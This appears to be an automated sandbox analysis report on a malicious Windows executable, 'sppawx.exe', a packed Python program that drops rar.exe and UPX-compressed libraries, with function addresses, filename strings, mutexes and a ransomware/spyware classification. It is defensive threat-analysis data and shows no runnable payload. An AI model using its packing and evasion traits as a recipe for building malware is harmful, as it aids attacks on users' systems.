Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A32E5E0	2_2_00007FF79A32E5E0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A323610	2_2_00007FF79A323610
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A325DA0	2_2_00007FF79A325DA0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A321DC4	2_2_00007FF79A321DC4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A335EEC	2_2_00007FF79A335EEC
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A329F10	2_2_00007FF79A329F10
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCC35DC0	2_2_00007FFEDCC35DC0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCCB7200	2_2_00007FFEDCCB7200
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCC3DE30	2_2_00007FFEDCC3DE30
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCC1BD80	2_2_00007FFEDCC1BD80
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCBF1541	2_2_00007FFEDCBF1541
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCBF1591	2_2_00007FFEDCBF1591
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCBF21F3	2_2_00007FFEDCBF21F3
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCBF1555	2_2_00007FFEDCBF1555
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCBF1FE6	2_2_00007FFEDCBF1FE6
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCC399A0	2_2_00007FFEDCC399A0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCC3D960	2_2_00007FFEDCC3D960
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCBF13DE	2_2_00007FFEDCBF13DE
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD239DB0	2_2_00007FFEDD239DB0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD238C98	2_2_00007FFEDD238C98
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD238594	2_2_00007FFEDD238594
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD260790	2_2_00007FFEDD260790
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD2399B4	2_2_00007FFEDD2399B4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD235A98	2_2_00007FFEDD235A98
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD23BADC	2_2_00007FFEDD23BADC
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD2352C4	2_2_00007FFEDD2352C4
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD271220	2_2_00007FFEDD271220
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD287120	2_2_00007FFEDD287120
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD273AD0	2_2_00007FFEDD273AD0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD2A8CF0	2_2_00007FFEDD2A8CF0
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD311850	2_2_00007FFEDD311850
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD2B0A50	2_2_00007FFEDD2B0A50
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD309A70	2_2_00007FFEDD309A70
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD2A8290	2_2_00007FFEDD2A8290
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD29FD60	2_2_00007FFEDD29FD60
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD296D42	2_2_00007FFEDD296D42
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256BB540	103_2_00007FF6256BB540
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256B1884	103_2_00007FF6256B1884
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256B82F0	103_2_00007FF6256B82F0
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256C1180	103_2_00007FF6256C1180
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256C54C0	103_2_00007FF6256C54C0
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256DAE10	103_2_00007FF6256DAE10
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256E7B24	103_2_00007FF6256E7B24
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256C0A2C	103_2_00007FF6256C0A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256BABA0	103_2_00007FF6256BABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6257186D4	103_2_00007FF6257186D4
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF625707660	103_2_00007FF625707660
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256EA710	103_2_00007FF6256EA710
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256F0710	103_2_00007FF6256F0710
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256F2700	103_2_00007FF6256F2700
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256C86C4	103_2_00007FF6256C86C4
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256DF5B0	103_2_00007FF6256DF5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256EF59C	103_2_00007FF6256EF59C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256C8598	103_2_00007FF6256C8598
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF62570260C	103_2_00007FF62570260C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256E65FC	103_2_00007FF6256E65FC
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6257018A8	103_2_00007FF6257018A8
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256C2890	103_2_00007FF6256C2890
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256B8884	103_2_00007FF6256B8884
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256ED91C	103_2_00007FF6256ED91C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256F190C	103_2_00007FF6256F190C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256E0904	103_2_00007FF6256E0904
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256E38E8	103_2_00007FF6256E38E8
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256D67E0	103_2_00007FF6256D67E0
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256C17C8	103_2_00007FF6256C17C8
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256F02A4	103_2_00007FF6256F02A4
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF625702268	103_2_00007FF625702268
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256BF24C	103_2_00007FF6256BF24C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256D7244	103_2_00007FF6256D7244
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF62570832C	103_2_00007FF62570832C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF625701314	103_2_00007FF625701314
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256B42E0	103_2_00007FF6256B42E0
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256CD2C0	103_2_00007FF6256CD2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6257141CC	103_2_00007FF6257141CC
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256F2164	103_2_00007FF6256F2164
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256CE21C	103_2_00007FF6256CE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256F81CC	103_2_00007FF6256F81CC
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256F5468	103_2_00007FF6256F5468
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256DD458	103_2_00007FF6256DD458
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256BA504	103_2_00007FF6256BA504
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256E0374	103_2_00007FF6256E0374
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256C2360	103_2_00007FF6256C2360
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256DC3E0	103_2_00007FF6256DC3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256FEEA4	103_2_00007FF6256FEEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256BCE84	103_2_00007FF6256BCE84
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256C8E68	103_2_00007FF6256C8E68
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256FAE50	103_2_00007FF6256FAE50
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256EAF0C	103_2_00007FF6256EAF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256B9EFC	103_2_00007FF6256B9EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF62570FE74	103_2_00007FF62570FE74
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256F9D74	103_2_00007FF6256F9D74
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256BEE08	103_2_00007FF6256BEE08
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256C1E04	103_2_00007FF6256C1E04
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF625701DCC	103_2_00007FF625701DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6257100F0	103_2_00007FF6257100F0
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256E0074	103_2_00007FF6256E0074
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256DC05C	103_2_00007FF6256DC05C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256E8040	103_2_00007FF6256E8040
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256D0104	103_2_00007FF6256D0104
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF62571DFD8	103_2_00007FF62571DFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256E5F4C	103_2_00007FF6256E5F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256C3030	103_2_00007FF6256C3030
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256EC00C	103_2_00007FF6256EC00C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256F4FE8	103_2_00007FF6256F4FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF62571AF90	103_2_00007FF62571AF90
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF62571AAC0	103_2_00007FF62571AAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256F5A70	103_2_00007FF6256F5A70
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256EFA6C	103_2_00007FF6256EFA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256BCB14	103_2_00007FF6256BCB14
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256DD97C	103_2_00007FF6256DD97C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256F69FD	103_2_00007FF6256F69FD
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256B49B8	103_2_00007FF6256B49B8
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256F5C8C	103_2_00007FF6256F5C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256E0D20	103_2_00007FF6256E0D20
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF625706D0C	103_2_00007FF625706D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256D9D0C	103_2_00007FF6256D9D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256BDD04	103_2_00007FF6256BDD04
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256F4B38	103_2_00007FF6256F4B38
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256C8C30	103_2_00007FF6256C8C30
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF625709B98	103_2_00007FF625709B98

Source: C:\Users\user\Desktop\sppawx.exe	Code function: String function: 00007FFEDD23DAF8 appears 45 times
Source: C:\Users\user\Desktop\sppawx.exe	Code function: String function: 00007FFEDCC6CDA1 appears 312 times
Source: C:\Users\user\Desktop\sppawx.exe	Code function: String function: 00007FFEDCBF132A appears 151 times
Source: C:\Users\user\Desktop\sppawx.exe	Code function: String function: 00007FF79A312710 appears 104 times
Source: C:\Users\user\Desktop\sppawx.exe	Code function: String function: 00007FFEDD23DC28 appears 68 times
Source: C:\Users\user\Desktop\sppawx.exe	Code function: String function: 00007FFEDD2794D8 appears 35 times
Source: C:\Users\user\Desktop\sppawx.exe	Code function: String function: 00007FFEDD279570 appears 163 times
Source: C:\Users\user\Desktop\sppawx.exe	Code function: String function: 00007FFEDCC6CD8F appears 87 times
Source: C:\Users\user\Desktop\sppawx.exe	Code function: String function: 00007FF79A312910 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: String function: 00007FF6256F49F4 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: String function: 00007FF6256C8444 appears 48 times

Source: sppawx.exe

Static PE information: invalid certificate

Source: rar.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: sppawx.exe	Binary or memory string: OriginalFilename vs sppawx.exe
Source: sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs sppawx.exe
Source: sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs sppawx.exe
Source: sppawx.exe, 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamedasHost.exej% vs sppawx.exe
Source: sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs sppawx.exe
Source: sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs sppawx.exe
Source: sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs sppawx.exe
Source: sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs sppawx.exe
Source: sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs sppawx.exe
Source: sppawx.exe, 00000000.00000003.1294996044.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs sppawx.exe
Source: sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs sppawx.exe
Source: sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs sppawx.exe
Source: sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs sppawx.exe
Source: sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs sppawx.exe
Source: sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs sppawx.exe
Source: sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs sppawx.exe
Source: sppawx.exe	Binary or memory string: OriginalFilename vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1755955148.00007FFEE6F34000.00000004.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1756200945.00007FFEEAFE4000.00000004.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1755121226.00007FFEDE1E2000.00000004.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamepython312.dll. vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1755625045.00007FFEE44EC000.00000004.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1757331507.00007FFEF5CF7000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1752845475.00007FFEDD433000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1754087915.00007FFEDD939000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1756436780.00007FFEECECC000.00000004.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamedasHost.exej% vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1755334189.00007FFEDE6B8000.00000004.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1751258096.00007FFEDCBEA000.00000004.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilenamelibsslH vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs sppawx.exe
Source: sppawx.exe, 00000002.00000002.1756674174.00007FFEED7AC000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs sppawx.exe
Source: sppawx.exe	Binary or memory string: OriginalFilenamedasHost.exej% vs sppawx.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

Source: C:\Users\user\Desktop\sppawx.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\sppawx.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: libcrypto-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
Source: libssl-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
Source: python312.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9994210643762751
Source: sqlite3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9971739243943192
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9942978533094812

Source: classification engine

Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@198/57@4/2

Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe

Code function: 103_2_00007FF6256CCAFC GetLastError,FormatMessageW,

103_2_00007FF6256CCAFC

Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256FB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,		103_2_00007FF6256FB57C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF6256CEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		103_2_00007FF6256CEF50

Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe

Code function: 103_2_00007FF6256D3144 GetDiskFreeSpaceExW,

103_2_00007FF6256D3144

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2880:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4356:120:WilError_03
Source: C:\Users\user\Desktop\sppawx.exe	Mutant created: \Sessions\1\BaseNamedObjects\f
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6708:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1300:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2028:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3268:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3884:120:WilError_03
